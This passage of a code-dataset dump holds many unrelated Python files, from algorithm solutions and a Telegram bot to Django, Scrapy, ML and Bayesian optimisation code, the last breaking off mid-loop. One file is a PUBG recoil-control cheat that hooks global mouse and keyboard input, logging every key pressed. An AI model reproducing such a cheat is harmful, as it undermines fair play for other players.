sum = iteration = 0\n        for i in range(len(A)):\n            sum += A[i]\n            iteration += (A[i] * i)\n        maxR = iteration\n        for j in range(1, len(A)):\n            iteration = iteration - sum + A[j-1] * len(A)\n            maxR = max(maxR, iteration)\n        return maxR\n\n    def maxRotateFunction3(self, A):\n        allSum = F = 0\n        for i in range(len(A)):\n            F += i * A[i]\n            allSum += A[i]\n        maxR = F\n        for i in range(len(A) - 1, -1, -1):\n            F = F + allSum - len(A) * A[i]\n            maxR = max(F, maxR)\n        return maxR\n\n\"\"\"\nF(k) = 0 * Bk[0] + 1 * Bk[1] + ... + (n-1) * Bk[n-1]\nF(k-1) = 0 * Bk-1[0] + 1 * Bk-1[1] + ... + (n-1) * Bk-1[n-1]\n       = 0 * Bk[1] + 1 * Bk[2] + ... + (n-2) * Bk[n-1] + (n-1) * Bk[0]\nthen,\nF(k) - F(k-1) = Bk[1] + Bk[2] + ... + Bk[n-1] + (1-n)Bk[0]\n              = (Bk[0] + ... 
+ Bk[n-1]) - nBk[0]\n = sum - nBk[0]\n F(k) = F(k-1) + sum - nBk[0]\n \nWhat is Bk[0]?\nk = 0; B[0] = A[0];\nk = 1; B[0] = A[len-1];\nk = 2; B[0] = A[len-2];\n\"\"\"\n\nA = [4,3,2,6]\n# A = [-2147483648,-2147483648]\nprint(Solution().maxRotateFunction3(A))","sub_path":"396RotateF.py","file_name":"396RotateF.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"325483006","text":"from figures import FIGURES\n\nLINE_MAX = 20\n\n\ndef find_longest(lines):\n longest = 0\n for line in lines:\n longest = max(longest, len(line))\n\n return longest\n\n\ndef line_split(line):\n split_lines = [\"\"]\n i = 0\n for word in line.split(' '):\n if len(split_lines[i] + ' ' + word) > LINE_MAX:\n split_lines.append('')\n i += 1\n split_lines[i] += ' ' + word\n\n return split_lines\n\n\ndef normalize(lines):\n longest = find_longest(lines)\n last = len(lines) - 1\n\n for l in range(1, last):\n line_len = len(lines[l])\n lines[l] = lines[l][0:line_len - 2] + ' ' * (longest - line_len) + ' |'\n\n lines[0] += '_' * (longest - len(lines[0]) - 1)\n lines[last] += '-' * (longest - len(lines[last]) - 1)\n\n\ndef make_bubble(lines):\n length = len(lines[0]) + 2\n\n for l in range(len(lines)):\n lines[l] = '| ' + lines[l] + ' |'\n\n underlines = ' '\n for i in range(length):\n underlines += '_'\n lines.insert(0, underlines)\n\n dashes = ' '\n for i in range(length):\n dashes += '-'\n lines.append(dashes)\n\n\ndef cow_said(input_text, figure):\n lines = input_text.splitlines()\n\n for line in lines:\n if len(line) > LINE_MAX:\n split_lines = line_split(line)\n pos = lines.index(line)\n lines.remove(line)\n lines[pos:pos] = split_lines\n\n make_bubble(lines)\n\n normalize(lines)\n\n says = '```' + '\\n'.join(lines) + FIGURES[figure] + '```'\n return says\n","sub_path":"cow.py","file_name":"cow.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"227329854","text":"# coding: utf-8\nfrom telegram.ext import Updater\nimport config\nimport logging\nfrom user_handlers import custom_handlers\nfrom user_jobs import custom_jobs\nfrom user_handlers.__error_handle import error_callback\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\nif config.PROXY:\n proxy_url = config.PROXY_URL\n updater = Updater(token=config.TOKEN, request_kwargs={'proxy_url': proxy_url})\nelse:\n updater = Updater(token=config.TOKEN)\ndispatcher = updater.dispatcher\njob = updater.job_queue\n\n# handle error\ndispatcher.add_error_handler(error_callback)\n\n# handle user_handlers\nfor handler in custom_handlers:\n dispatcher.add_handler(handler)\n\n# jobs\nfor job_info in custom_jobs:\n job.run_repeating(**job_info)\n\nif __name__ == '__main__':\n # polling mode\n updater.start_polling()\n updater.idle()\n\n # Webhook mode\n # updater.start_webhook(listen='127.0.0.1', port=12306, url_path='TOKEN')\n # updater.bot.set_webhook(url='https://telegram.xxx.xx/TOKEN')\n # updater.idle()\n","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"56750311","text":"from django.conf.urls import include, url\nfrom rest_framework import routers\n\nfrom .views import (CreateCallViewSet, EndCallViewSet, MonthlyBillingView)\n\n# Routers provide an easy way of automatically determining the 
URL conf.\nrouter = routers.DefaultRouter()\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'^call/start/$', CreateCallViewSet.as_view()),\n url(r'^call/(?P[0-9]+)/end/$', EndCallViewSet.as_view()),\n url(r'^bills/(?P[0-9]+)/$', MonthlyBillingView.as_view())\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"347447959","text":"import os\n\nimport scrapy\nimport requests\n\nfrom isentia.items import IsentiaItem\n\n\nclass IsentiaSpider(scrapy.Spider):\n name = 'isentia'\n start_urls = [\n 'https://www.isentia.com/news/blog/ideas',\n 'https://www.isentia.com/news/blog/issues-that-matter',\n 'https://www.isentia.com/news/blog/viewpoint',\n 'https://www.isentia.com/news/blog/access-project'\n ]\n\n def parse(self, response):\n \"\"\"\n Parse links to Isentia blog post articles from subject index page and\n follow links to parse article contents.\n \"\"\"\n for href in response.xpath('//h2//a'):\n yield response.follow(href, callback=self.parse_article)\n\n def parse_article(self, response):\n \"\"\"\n Parse contents of Isentia blog post yielding an IsentiaItem.\n \"\"\"\n item = IsentiaItem()\n item['author'] = 'Isentia',\n item['text'] = self.cleansed(response.css('#main-content')),\n item['url'] = response._url,\n item['headline'] = response.xpath(\n '//h1/text()').extract_first().strip(),\n item['sub_heading'] = response.xpath(\n '//h2/text()').extract_first().strip()\n yield item\n\n def cleansed(self, content):\n \"\"\"\n Extract cleansed plaintext from nested html elements.\n\n XPath expression was inspired by:\n https://stackoverflow.com/questions/26301831/extracting-text-xpath-scrapy\n \"\"\"\n tokens = content.xpath('descendant-or-self::*/text()').extract()\n return ' '.join([t.strip() for t in tokens if t]).strip()\n","sub_path":"isentia/isentia/spiders/isentia_spider.py","file_name":"isentia_spider.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"99063656","text":"import unittest\nimport sys\nsys.path.append(\"../\")\nfrom Models.payment import *\n\nclass TestPayment(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n self.juan_payment = Payment(\"Visa\", \"12345678\", \"Juan Gnecco\")\n\n def test_user_payment_is_a_user_payment(self):\n self.assertIsInstance(self.juan_payment, Payment)\n\n def test_user_can_enter_payment_credentials(self):\n self.assertEqual(self.juan_payment.get_full_name(), \"Juan Gnecco\")\n self.assertEqual(self.juan_payment.get_payment_type(), \"Visa\")\n self.assertEqual(self.juan_payment.get_account_number(), \"12345678\")\n\nif __name__ == \"__main__\":\n unittest.main()\n\n\n\n","sub_path":"Tests/payment_test.py","file_name":"payment_test.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"305014573","text":"from .header import *\n\n'''\nEncoder component for ReGe\ninpt: \n src: [seq, batch, embedding]\n src_l: [batch]\nopt:\n context: [seq, batch, hidden]\n hidden: [batch, hidden]\n'''\n\nclass GRUEncoder(nn.Module):\n\n def __init__(self, embed_size, hidden_size, \n n_layers=1, dropout=0.5, bidirectional=True):\n super(GRUEncoder, self).__init__()\n self.bidirectional = bidirectional\n self.n_layer = n_layers\n self.hidden_size = hidden_size\n # self.embed = nn.Embedding(input_size, 
embed_size)\n        self.rnn = nn.GRU(\n                embed_size, \n                hidden_size, \n                num_layers=n_layers, \n                dropout=(0 if n_layers == 1 else dropout),\n                bidirectional=bidirectional)\n        self.times = n_layers*2 if bidirectional else n_layers\n        self.hidden_project = nn.Linear(self.times*hidden_size, hidden_size)\n        self.init_weight()\n\n    def init_weight(self):\n        init.xavier_normal_(self.rnn.weight_hh_l0)\n        init.xavier_normal_(self.rnn.weight_ih_l0)\n        self.rnn.bias_ih_l0.data.fill_(0.0)\n        self.rnn.bias_hh_l0.data.fill_(0.0)\n\n    def forward(self, src, src_l):\n        # src: [seq, batch, embed]\n        embed = nn.utils.rnn.pack_padded_sequence(src, src_l, enforce_sorted=False)\n        output, hidden = self.rnn(embed)\n        output, _ = nn.utils.rnn.pad_packed_sequence(output)\n\n        # output: [seq, batch, hidden * bidirectional]\n        # hidden: [n_layer * bidirectional, batch, hidden]\n        if self.bidirectional:\n            output = output[:, :, :self.hidden_size] + output[:, :, self.hidden_size:]\n        hidden = hidden.permute(1, 2, 0)    # [batch, hidden, n_layer * bidirectional]\n        hidden = hidden.reshape(hidden.shape[0], -1)    # [batch, hidden*...]\n        hidden = torch.tanh(self.hidden_project(hidden))    # [batch, hidden]\n        return output, hidden\n","sub_path":"models/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"595985473","text":"# -*- coding: utf-8 -*-\r\n\r\nimport sys\r\nimport time\r\nfrom threading import Thread\r\nfrom concurrent.futures import ThreadPoolExecutor\r\n\r\nfrom pynput import mouse, keyboard\r\n\r\nfrom .log import logger\r\nfrom .config import GUN\r\nfrom .models import GunType\r\n\r\n\r\nclass PUBG(object):\r\n\tdef __init__(self):\r\n\t\tself.on = False\r\n\t\tself.shooting = False\r\n\t\tself.gun = GunType(GUN)\r\n\t\tself.mouse = mouse.Controller()\r\n\t\tself.keyboard = keyboard.Controller()\r\n\t\tself.banner()\r\n\r\n\tdef banner(self):\r\n\t\tlogger.info('Status: OFF')\r\n\t\tlogger.info('Press F5 to start/stop listening.')\r\n\t\tlogger.info('Now you are using {}'.format(self.gun.name))\r\n\r\n\tdef start(self):\r\n\t\twith ThreadPoolExecutor(max_workers=5) as executor:\r\n\t\t\texecutor.submit(self.mouse_listener)\r\n\t\t\texecutor.submit(self.keyboard_listener)\r\n\t\t\texecutor.submit(self.moving)\r\n\r\n\t# Monitoring the mouse\r\n\tdef on_move(self, x, y):\r\n\t\t# logger.debug('Pointer moved to {0}'.format((x, y)))\r\n\t\tpass\r\n\r\n\tdef on_click(self, x, y, button, pressed):\r\n\t\tlogger.debug('{0} at {1}'.format('Pressed' if pressed else 'Released', (x, y)))\r\n\t\tif self.on and button == mouse.Button.left:\r\n\t\t\tself.shooting = pressed\r\n\r\n\r\n\tdef on_scroll(self, x, y, dx, dy):\r\n\t\tlogger.debug('Scrolled {0} at {1}'.format('down' if dy < 0 else 'up', (x, y)))\r\n\t\t\r\n\t# Monitoring the keyboard\r\n\tdef on_press(self, key):\r\n\t\ttry:\r\n\t\t\tlogger.debug('alphanumeric key {0} pressed'.format(key.char))\r\n\t\texcept KeyboardInterrupt:\r\n\t\t\tsys.exit(0)\r\n\t\texcept AttributeError:\r\n\t\t\tlogger.debug('special key {0} pressed'.format(key))\r\n\r\n\t\tif key == keyboard.Key.f5:\r\n\t\t\tself.on = not self.on\r\n\t\t\tif self.on:\r\n\t\t\t\tlogger.info('Status: ON')\r\n\t\t\telse:\r\n\t\t\t\tlogger.info('Status: OFF')\r\n\r\n\tdef on_release(self, key):\r\n\t\tlogger.debug('{0} released'.format(key))\r\n\r\n\t# listening\r\n\tdef mouse_listener(self):\r\n\t\twith mouse.Listener(on_move=self.on_move, \r\n\t\t\t\t\t\t\ton_click=self.on_click, 
\r\n\t\t\t\t\t\t\ton_scroll=self.on_scroll) as listener:\r\n\t\t\tlistener.join()\r\n\r\n\tdef keyboard_listener(self):\r\n\t\twith keyboard.Listener(on_press=self.on_press, \r\n\t\t\t\t\t\t\t   on_release=self.on_release) as listener:\r\n\t\t\tlistener.join()\r\n\r\n\r\n\t# Mouse Cheating track\r\n\tdef moving(self):\r\n\t\twhile True:\r\n\t\t\tif self.on and self.shooting:\r\n\t\t\t\tself.mouse.move(0 ,self.gun.delta)\r\n\t\t\t\tprint('move move move move')\r\n\t\t\t\ttime.sleep(self.gun.cd)\r\n\t\t\t\tself.gun.init()\r\n\t\t\t\r\n\t\t\t\r\n","sub_path":"pubg/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"7705574","text":"\"\"\"\nThe setup file for chilidoc\n\"\"\"\n\nfrom setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n    long_description = f.read()\n\nsetup(\n    name=\"chilidoc\",\n    version=\"1.0.0\",\n    description=\"Simple AsciiDoc style typesetting language converter\",\n    long_description=long_description,\n    url=\"https://github.com/EthanDayley/chilidoc.git\",\n    author=\"Ethan Dayley\",\n    classifiers=[\n        \"Development Status :: 3 - Alpha\",\n        \"Intended Audience :: Developers\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Programming Language :: Python :: 3\"\n    ],\n    keywords=\"markdown language typeset html converter\",\n    packages=[\"chilidoc\"],\n    zip_safe=False\n    )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"399085160","text":"\"\"\"\nThis is a boilerplate-skipping wrapper for myradex h13cn.\n\nIt's not very generalizable.\n\n\"\"\"\n\nfrom __future__ import division\nimport wrapper_my_radex\nwrapper = wrapper_my_radex.myradex_wrapper\nfrom myradex_table_function import table_from_myradex_datatransitions\n\nn_levels, n_item, n_transitions = wrapper.config_basic(\n    '/Users/tsrice/Documents/Academia/Misc_Software/Radex/data/',\n    'h13cn@xpol.dat', 2.7, True)\n\ndefault_params = {\n    'tkin': None,\n    'dv_cgs': 1e5, # What is this? 
oh, it's delta v in cm/s\n    'dens_x_cgs': 1e-2, # I think this is not a relevant parameter?\n    'ncol_x_cgs': None,\n    'h2_density_cgs': None,\n    'hi_density_cgs': 0.0,\n    'oh2_density_cgs': 0.0,\n    'ph2_density_cgs': 0.0,\n    'hii_density_cgs': 0.0,\n    'electron_density_cgs': 0.0,\n    'n_levels': n_levels,\n    'n_item': n_item,\n    'n_transitions': n_transitions,\n    'geotype': 'lvg'}\n\n# How do we pass in that dict of default params but update specific items if necessary?\ndef myradex_h13cn(kinetic_temperature=None, collider_density=None, column_density=None):\n\n    params = default_params.copy()\n\n    params['tkin'] = kinetic_temperature\n    params['ncol_x_cgs'] = column_density\n    params['h2_density_cgs'] = collider_density\n\n    # load the stuff from the molecular data file\n\n    output_dict = {}\n    (output_dict['energies'], \n     output_dict['f_occupations'], \n     output_dict['data_transitions'], \n     output_dict['cooling_rate']) = wrapper.run_one_params(**params)\n    output_dict['table'] = table_from_myradex_datatransitions(output_dict['data_transitions'])\n\n    return output_dict\n","sub_path":"h13cn_myradex_interface.py","file_name":"h13cn_myradex_interface.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"347986463","text":"# Copyright The Cloud Custodian Authors.\n# SPDX-License-Identifier: Apache-2.0\n#\n\n\nfrom c7n.utils import local_session, yaml_load\n\nfrom .common import BaseTest\n\n\nclass TestQuotas(BaseTest):\n    def test_service_quota_request_history_filter(self):\n        session_factory = self.replay_flight_data('test_service_quota')\n        policy = yaml_load(\"\"\"\n            name: service-quota-history-filter\n            resource: aws.service-quota\n            filters:\n              - type: request-history\n                key: \"[].Status\"\n                value: CASE_CLOSED\n                op: in\n                value_type: swap\n            \"\"\")\n        p = self.load_policy(\n            policy,\n            session_factory=session_factory\n        )\n        resources = p.run()\n        self.assertTrue(resources)\n\n    def test_service_quota_request_increase(self):\n        session_factory = self.replay_flight_data('test_service_quota')\n        policy = yaml_load(\"\"\"\n            name: service-quota-request-increase\n            resource: aws.service-quota\n            filters:\n              - QuotaCode: L-355B2B67\n            actions:\n              - type: request-increase\n                multiplier: 1.2\n            \"\"\")\n        p = self.load_policy(policy, session_factory=session_factory)\n        resources = p.run()\n        self.assertEqual(len(resources), 1)\n        client = local_session(session_factory).client('service-quotas')\n        changes = client.list_requested_service_quota_change_history_by_quota(\n            ServiceCode=resources[0]['ServiceCode'],\n            QuotaCode=resources[0]['QuotaCode']\n        )['RequestedQuotas']\n        self.assertTrue(changes)\n\n    def test_usage_metric_filter(self):\n        session_factory = self.replay_flight_data('test_service_quota')\n        policy = yaml_load(\"\"\"\n            name: service-quota-usage-metric\n            resource: aws.service-quota\n            filters:\n              - UsageMetric: present\n              - type: usage-metric\n                limit: 20\n            \"\"\")\n        p = self.load_policy(policy, session_factory=session_factory)\n        resources = p.run()\n        self.assertEqual(len(resources), 1)\n","sub_path":"tests/test_quotas.py","file_name":"test_quotas.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"347581870","text":"from flask import Flask, render_template, request, send_from_directory, redirect, url_for\n\n\nUPLOAD_FOLDER = '/presentations'\n\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\n@app.route('/', 
methods=['POST', 'GET'])\n@app.route('/start', methods=['POST', 'GET'])\ndef start():\n    return render_template(\"start.html\")\n\n\n@app.route('/pattern', methods=['POST', 'GET'])\ndef pattern():\n    if request.method == 'POST':\n        if request.form.get('1') == \"1\":\n            return send_from_directory(directory=\"presentations\", filename=\"algebra.pptx\", as_attachment=True)\n        if request.form.get('2') == \"2\":\n            return send_from_directory(directory=\"presentations\", filename=\"Russian.pptx\", as_attachment=True)\n        if request.form.get('3') == \"3\":\n            return send_from_directory(directory=\"presentations\", filename=\"chemistry.pptx\", as_attachment=True)\n    return render_template(\"pattern.html\")\n\n\n@app.route('/check', methods=['POST', 'GET'])\ndef check():\n    if request.method == 'POST':\n        file = request.files['file']\n        file.save(\"files/\" + file.filename)\n        return redirect(\"/response/\" + file.filename)\n    return render_template(\"check.html\")\n\n@app.route('/response/', methods=['POST', 'GET'])\ndef response(file):\n    if file == \"kreativnost.pptx\":\n        return render_template(\"response.html\")\n    elif file == \"PUSK.pptx\":\n        return render_template(\"response2.html\")\n    return redirect(\"/check\")\n\n\n@app.route('/recommendation', methods=['POST', 'GET'])\ndef recommendation():\n    return render_template(\"recommendation.html\")\n\n\nif __name__ == '__main__':\n    app.run(port=8080, host='127.0.0.1')\n","sub_path":"PUSK.py","file_name":"PUSK.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"36397003","text":"from collections import defaultdict\nimport utils\n\n\nclass Agent:\n    def __init__(self, game):\n        self.game = game\n\n    @staticmethod\n    def greedy_pick(action_value_dict, find_one=True, thresh=0):\n        if find_one:  # find one argmaxizer\n            return max(action_value_dict, key=action_value_dict.get)\n        else:\n            best_score = -float('inf')\n            best_actions = []\n            for action, value in action_value_dict.items():\n                flag = utils.compare(value, best_score, thresh)\n                if flag == 1:  # a strictly better action is found\n                    best_score = value\n                    best_actions = [action]\n                elif flag == 0:  # an action which ties the best action is found\n                    best_actions.append(action)\n            return best_actions\n\n    def policy_run(self, policy, *reset_args):\n        state = self.game.reset(*reset_args)\n        state_ls = []\n        reward_ls = []\n        is_terminal = False\n        while not is_terminal:\n            state_ls.append(state)\n            action = policy[state]\n            state, reward, is_terminal = self.game.one_move(action)\n            reward_ls.append(reward)\n        return state_ls, reward_ls\n\n    def policy_eval_on(self, policy, n_episodes=10 ** 5):\n        \"\"\"Using Monte-Carlo to evaluate a given policy.\n        :param policy (dict) -- only consider deterministic policy, action = policy[state]\n        \"\"\"\n        value_fun = {state: utils.Averager() for state in policy}\n        for i in range(n_episodes):\n            state_ls, reward_ls = self.policy_run(policy)\n            v = 0\n            for s, r in zip(reversed(state_ls), reversed(reward_ls)):\n                v = self.game.gamma * v + r\n                value_fun[s].add_new(v)\n        return value_fun\n\n    def policy_eval_off(self, policy):\n        pass\n","sub_path":"tabular_learning/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"238877865","text":"## Exercise 78\r\n# Write a program that converts a decimal (base 10) number, entered by a user as an integer,\r\n# using the division algorithm shown below to perform the conversion. \r\n# When the algorithm completes, the result will contain the representation of the number in binary. \r\n# The result should then be displayed with an appropriate message.\r\n# Let resultado be an empty string variable.\r\n# Let “q” be an integer to convert\r\n# Repeat:\r\n    # Let “r” equal the remainder when “q” is divided by 2.\r\n    # Convert “r” to a string, adding it to the start of resultado\r\n    # Divide “q” by 2, drop any remainder and store the result back into “q”\r\n# Until “q” is zero\r\n\r\nresultado = ''\r\nq = int(input('Enter the number: '))\r\n\r\n\r\nr = q % 2\r\n\r\nresultado = str(r) + resultado\r\nq = q // 2\r\n\r\n\r\nwhile q > 0:\r\n    r = q % 2\r\n    resultado = str(r) + resultado\r\n    q = q // 2 \r\n\r\nprint('binary', resultado)\r\n\r\n","sub_path":"78.py","file_name":"78.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"112337598","text":"# Author: Ryan-Rhys Griffiths\n\"\"\"\nThis module contains the code for heteroscedastic Bayesian Optimisation on the Freesolv dataset.\n\"\"\"\n\nimport argparse\nimport os\nimport sys\nimport warnings\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn.model_selection import train_test_split\n\nsys.path.append('../')\nsys.path.append('../..')\nsys.path.append('../../..')\n\nfrom data_utils import parse_dataset\nfrom acquisition_funcs.acquisition_functions import heteroscedastic_expected_improvement, heteroscedastic_propose_location, \\\n    my_propose_location, my_expected_improvement, augmented_expected_improvement, heteroscedastic_augmented_expected_improvement\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n\ndef main(penalty, aleatoric_weight, random_trials, bayes_opt_iters, init_set_size, n_components, path):\n    \"\"\"\n    Script for running the heteroscedastic Bayesian optimisation experiment on the Freesolv dataset.\n\n    param: penalty: $\alpha$ parameter specifying weight of noise component to objective\n    param: aleatoric_weight: float specifying the value of $\beta$ of ANPEI\n    param: random_trials: int specifying the number of random initialisations\n    param: bayes_opt_iters: int specifying the number of iterations of BayesOpt\n    param: init_set_size: int specifying the size of the initialisation set.\n    param: n_components: int specifying the number of PCA principal components to keep.\n    param: path: str specifying the path to the Freesolv.txt file.\n    \"\"\"\n\n    task = 'FreeSolv'\n    use_frag = True\n    use_exp = True  # use experimental values.\n\n    xs, ys, std = parse_dataset(task, path, use_frag, use_exp)\n\n    warnings.filterwarnings('ignore')\n\n    # We perform random trials of Bayesian Optimisation\n\n    rand_running_sum = np.zeros(bayes_opt_iters)\n    rand_squares = np.zeros(bayes_opt_iters)\n    homo_running_sum = np.zeros(bayes_opt_iters)\n    homo_squares = np.zeros(bayes_opt_iters)  # Following the single-pass estimator given on pg. 
192 of mathematics for machine learning\n hetero_running_sum = np.zeros(bayes_opt_iters)\n hetero_squares = np.zeros(bayes_opt_iters)\n aug_running_sum = np.zeros(bayes_opt_iters)\n aug_squares = np.zeros(bayes_opt_iters)\n aug_het_running_sum = np.zeros(bayes_opt_iters)\n aug_het_squares = np.zeros(bayes_opt_iters)\n\n # We compute the objective corresponding to aleatoric noise only\n\n rand_noise_running_sum = np.zeros(bayes_opt_iters)\n rand_noise_squares = np.zeros(bayes_opt_iters)\n homo_noise_running_sum = np.zeros(bayes_opt_iters)\n homo_noise_squares = np.zeros(bayes_opt_iters) # Following the single-pass estimator given on pg. 192 of mathematics for machine learning\n hetero_noise_running_sum = np.zeros(bayes_opt_iters)\n hetero_noise_squares = np.zeros(bayes_opt_iters)\n aug_noise_running_sum = np.zeros(bayes_opt_iters)\n aug_noise_squares = np.zeros(bayes_opt_iters)\n aug_het_noise_running_sum = np.zeros(bayes_opt_iters)\n aug_het_noise_squares = np.zeros(bayes_opt_iters)\n\n for i in range(random_trials):\n\n start_seed = 47\n numpy_seed = i + start_seed # set to avoid segfault issue\n # ('Process finished with exit code 139 (interrupted by signal 11: SIGSEGV)') when i = 0\n\n # test in this instance is the initialisation set for Bayesian Optimisation and train is the heldout set.\n\n xs_train, xs_test, ys_train, ys_test = train_test_split(xs, ys, test_size=init_set_size, random_state=numpy_seed, shuffle=True)\n\n pca = PCA(n_components)\n xs_test = pca.fit_transform(xs_test)\n print('Fraction of variance retained is: ' + str(sum(pca.explained_variance_ratio_)))\n xs_train = pca.transform(xs_train)\n\n _, _, std_train, std_test = train_test_split(xs, std, test_size=init_set_size, random_state=numpy_seed, shuffle=True)\n\n ys_train = ys_train.reshape(-1, 1)\n ys_test = ys_test.reshape(-1, 1)\n\n init_num_samples = len(ys_test)\n\n bounds = np.array([np.array([np.min(xs_train[:, i]), np.max(xs_train[:, i])]) for i in range(xs_train.shape[1])])\n\n # Can only plot in 2D\n\n if n_components == 2:\n x1_star = np.arange(np.min(xs_train[:, 0]), np.max(xs_train[:, 0]), 0.2)\n x2_star = np.arange(np.min(xs_train[:, 1]), np.max(xs_train[:, 1]), 0.2)\n plot_sample = np.array(np.meshgrid(x1_star, x2_star)).T.reshape(-1, 2) # Where 2 gives the dimensionality\n else:\n plot_sample = None\n\n X_init = xs_test\n Y_init = ys_test\n\n # Initialize samples\n homo_X_sample = X_init\n homo_Y_sample = Y_init\n het_X_sample = X_init\n het_Y_sample = Y_init\n aug_X_sample = X_init\n aug_Y_sample = Y_init\n aug_het_X_sample = X_init\n aug_het_Y_sample = Y_init\n\n # initial GP hypers\n\n l_init = 1.0\n sigma_f_init = 1.0\n noise = 1.0\n l_noise_init = 1.0\n sigma_f_noise_init = 1.0\n gp2_noise = 1.0\n num_iters = 10\n sample_size = 100\n\n rand_best_so_far = 300\n homo_best_so_far = 300 # value to beat\n het_best_so_far = 300\n aug_best_so_far = 300\n aug_het_best_so_far = 300\n rand_noise_best_so_far = 300\n homo_noise_best_so_far = 300 # value to beat\n het_noise_best_so_far = 300\n aug_noise_best_so_far = 300\n aug_het_noise_best_so_far = 300\n rand_obj_val_list = []\n homo_obj_val_list = []\n het_obj_val_list = []\n aug_obj_val_list = []\n aug_het_obj_val_list = []\n rand_noise_val_list = []\n homo_noise_val_list = []\n het_noise_val_list = []\n aug_noise_val_list = []\n aug_het_noise_val_list = []\n rand_collected_x = []\n homo_collected_x = []\n het_collected_x = []\n aug_collected_x = []\n aug_het_collected_x = []\n\n for j in range(bayes_opt_iters):\n\n print(j)\n\n # take random point from 
uniform distribution\n rand_X_next = np.random.uniform(np.min(xs_train, axis=0), np.max(xs_train, axis=0)) # this just takes X not the sin function itself\n # Obtain next noisy sample from the objective function\n rand_X_next = min(xs_train, key=lambda x: np.linalg.norm(x - rand_X_next)) # Closest point in the heldout set.\n rand_index = list(xs_train[:, 0]).index(rand_X_next[0]) # index by first dimension\n rand_Y_next = ys_train[rand_index]\n rand_composite_obj_val = rand_Y_next + penalty*std_train[rand_index]\n rand_noise_val = std_train[rand_index]\n rand_collected_x.append(rand_X_next)\n\n # check if random point's Y value is better than best so far\n if rand_composite_obj_val < rand_best_so_far:\n rand_best_so_far = rand_composite_obj_val\n rand_obj_val_list.append(rand_composite_obj_val)\n else:\n rand_obj_val_list.append(rand_best_so_far)\n # if yes, save it, if no, save best so far into list of best y-value per iteration in rand_composite_obj_val\n\n if rand_noise_val < rand_noise_best_so_far:\n rand_noise_best_so_far = rand_noise_val\n rand_noise_val_list.append(rand_noise_val)\n else:\n rand_noise_val_list.append(rand_noise_best_so_far)\n\n # Obtain next sampling point from the acquisition function (expected_improvement)\n\n homo_X_next = my_propose_location(my_expected_improvement, homo_X_sample, homo_Y_sample, noise, l_init, sigma_f_init,\n bounds, plot_sample, n_restarts=3, min_val=300)\n\n homo_collected_x.append(homo_X_next)\n\n # Obtain next noisy sample from the objective function\n homo_X_next = min(xs_train, key=lambda x: np.linalg.norm(x - homo_X_next)) # Closest point in the heldout set.\n homo_index = list(xs_train[:, 0]).index(homo_X_next[0]) # index by first dimension\n homo_Y_next = ys_train[homo_index]\n homo_composite_obj_val = homo_Y_next + penalty*std_train[homo_index]\n homo_noise_val = std_train[homo_index]\n homo_collected_x.append(homo_X_next)\n\n if homo_composite_obj_val < homo_best_so_far:\n homo_best_so_far = homo_composite_obj_val\n homo_obj_val_list.append(homo_composite_obj_val)\n else:\n homo_obj_val_list.append(homo_best_so_far)\n\n if homo_noise_val < homo_noise_best_so_far:\n homo_noise_best_so_far = homo_noise_val\n homo_noise_val_list.append(homo_noise_val)\n else:\n homo_noise_val_list.append(homo_noise_best_so_far)\n\n # Add sample to previous samples\n homo_X_sample = np.vstack((homo_X_sample, homo_X_next))\n homo_Y_sample = np.vstack((homo_Y_sample, homo_Y_next))\n\n # Obtain next sampling point from the het acquisition function (ANPEI)\n\n het_X_next = heteroscedastic_propose_location(heteroscedastic_expected_improvement, het_X_sample,\n het_Y_sample, noise, l_init, sigma_f_init, l_noise_init,\n sigma_f_noise_init, gp2_noise, num_iters, sample_size, bounds,\n plot_sample, n_restarts=3, min_val=300, aleatoric_weight=aleatoric_weight)\n\n het_collected_x.append(het_X_next)\n\n # Obtain next noisy sample from the objective 